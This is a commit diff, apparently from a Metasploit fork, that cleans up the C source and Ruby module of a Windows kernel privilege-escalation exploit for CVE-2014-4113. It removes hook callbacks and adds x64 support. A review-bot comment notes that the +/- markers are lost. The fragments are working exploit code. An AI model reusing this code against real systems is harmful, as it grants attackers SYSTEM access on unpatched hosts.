Land zeroSteiner/metasploit-framework#9 clean up
commit
2d76a8da4a
Binary file not shown.
Binary file not shown.
|
@ -23,7 +23,6 @@ typedef QWORD *PQWORD;
|
|||
|
||||
int WndProcClue = 0;
|
||||
int HookCallbackClue = 0;
|
||||
int HookCallbackThreeClue = 0;
|
||||
WNDPROC lpPrevWndFunc;
|
||||
DWORD MyProcessId = 0;
|
||||
DWORD OffsetWindows = 0;
|
||||
|
@ -71,49 +70,12 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
|
|||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||
|
||||
LRESULT __stdcall HookCallbackThree(int code, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
if (wParam == 4 && *(DWORD *)lParam == GetCurrentThreadId() && *(DWORD *)(lParam + 12) == 0x900516)
|
||||
HookCallbackThreeClue = 1;
|
||||
return CallNextHookEx(0, code, wParam, lParam);
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
EndMenu();
|
||||
return -5;
|
||||
}
|
||||
#else
|
||||
LRESULT __stdcall HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
LRESULT result;
|
||||
DWORD v5;
|
||||
|
||||
if (Msg == 0x1EB)
|
||||
{
|
||||
v5 = GetCurrentThreadId();
|
||||
SetWindowsHookExA(9, HookCallbackThree, 0, v5);
|
||||
SendMessageA(hWnd, 0, 0x900516u, 0);
|
||||
UnhookWindowsHook(9, HookCallbackThree);
|
||||
if (HookCallbackThreeClue)
|
||||
{
|
||||
EndMenu();
|
||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, 0x1EBu, wParam, lParam);
|
||||
}
|
||||
else
|
||||
{
|
||||
EndMenu();
|
||||
result = -5;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, Msg, wParam, lParam);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
#endif
|
||||
|
||||
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
||||
#ifdef _M_X64
|
||||
|
@ -146,47 +108,10 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
|||
|
||||
#ifdef _M_X64
|
||||
QWORD MyPtiCurrent(void) {
|
||||
struct _IMAGE_DOS_HEADER *hUser32;
|
||||
PIMAGE_DOS_HEADER dosHeader;
|
||||
FARPROC tmpProcAddress;
|
||||
PIMAGE_NT_HEADERS ntHeader;
|
||||
QWORD imageBase;
|
||||
BYTE currentByte;
|
||||
QWORD sizeOfImage;
|
||||
int counter;
|
||||
PIMAGE_DOS_HEADER(*v8)(void);
|
||||
PIMAGE_DOS_HEADER *v10;
|
||||
void *teb = (void *)__readgsqword(0x30);
|
||||
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
|
||||
|
||||
v10 = 0;
|
||||
hUser32 = LoadLibraryA("user32.dll");
|
||||
dosHeader = hUser32;
|
||||
if (hUser32) {
|
||||
tmpProcAddress = GetProcAddress(hUser32, "AnimateWindow");
|
||||
if (tmpProcAddress && dosHeader->e_magic == 'ZM') {
|
||||
ntHeader = (PIMAGE_NT_HEADERS)((BYTE *)dosHeader + dosHeader->e_lfanew);
|
||||
imageBase = ntHeader->OptionalHeader.ImageBase;
|
||||
currentByte = *(BYTE *)tmpProcAddress;
|
||||
sizeOfImage = imageBase + ntHeader->OptionalHeader.SizeOfImage;
|
||||
counter = 0;
|
||||
do {
|
||||
if (currentByte == 0xe8) {
|
||||
v8 = (FARPROC)((char *)tmpProcAddress);
|
||||
v8 = (FARPROC)((QWORD)v8 + counter);
|
||||
v8 = (FARPROC)((DWORD)v8 + *(DWORD *)((char *)tmpProcAddress + counter + 1));
|
||||
v8 = (FARPROC)((QWORD)v8 + 5);
|
||||
if (((QWORD)v8 >= imageBase) && ((QWORD)v8 <= sizeOfImage)) {
|
||||
v10 = (PIMAGE_DOS_HEADER *)v8();
|
||||
break;
|
||||
}
|
||||
}
|
||||
counter++;
|
||||
currentByte = *((BYTE *)tmpProcAddress + counter);
|
||||
} while (counter <= 70);
|
||||
}
|
||||
FreeLibrary(dosHeader);
|
||||
dosHeader = (PIMAGE_DOS_HEADER)v10;
|
||||
}
|
||||
return (QWORD)dosHeader;
|
||||
return Win32ThreadInfo;
|
||||
}
|
||||
#else
|
||||
DWORD __stdcall MyPtiCurrent() {
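Review bot: In the x64 `MyPtiCurrent`, the offsets `0x30` (argument to `__readgsqword`) and `0x78` (added to `teb`) are bare magic numbers, and nothing states which structure layout they assume. Going by the hunk counts, these two reads and `return Win32ThreadInfo;` look like the added lines, but the rendering has lost the `+`/`-` markers, so that is inferred. I would give both offsets named constants and put a one-line comment above the reads, e.g. `/* offsets assume the x64 TEB layout this module was tested against */`. It is also worth confirming that the preceding `return (QWORD)dosHeader;` is really gone, since otherwise the new return is unreachable. The `#else` branch of the function continues past the end of the hunk.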
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'juan vazquez', # msf module (x86 target)
|
||||
'Spencer McIntyre' # msf module (x64 target)
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
|
@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
end
|
||||
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
|
|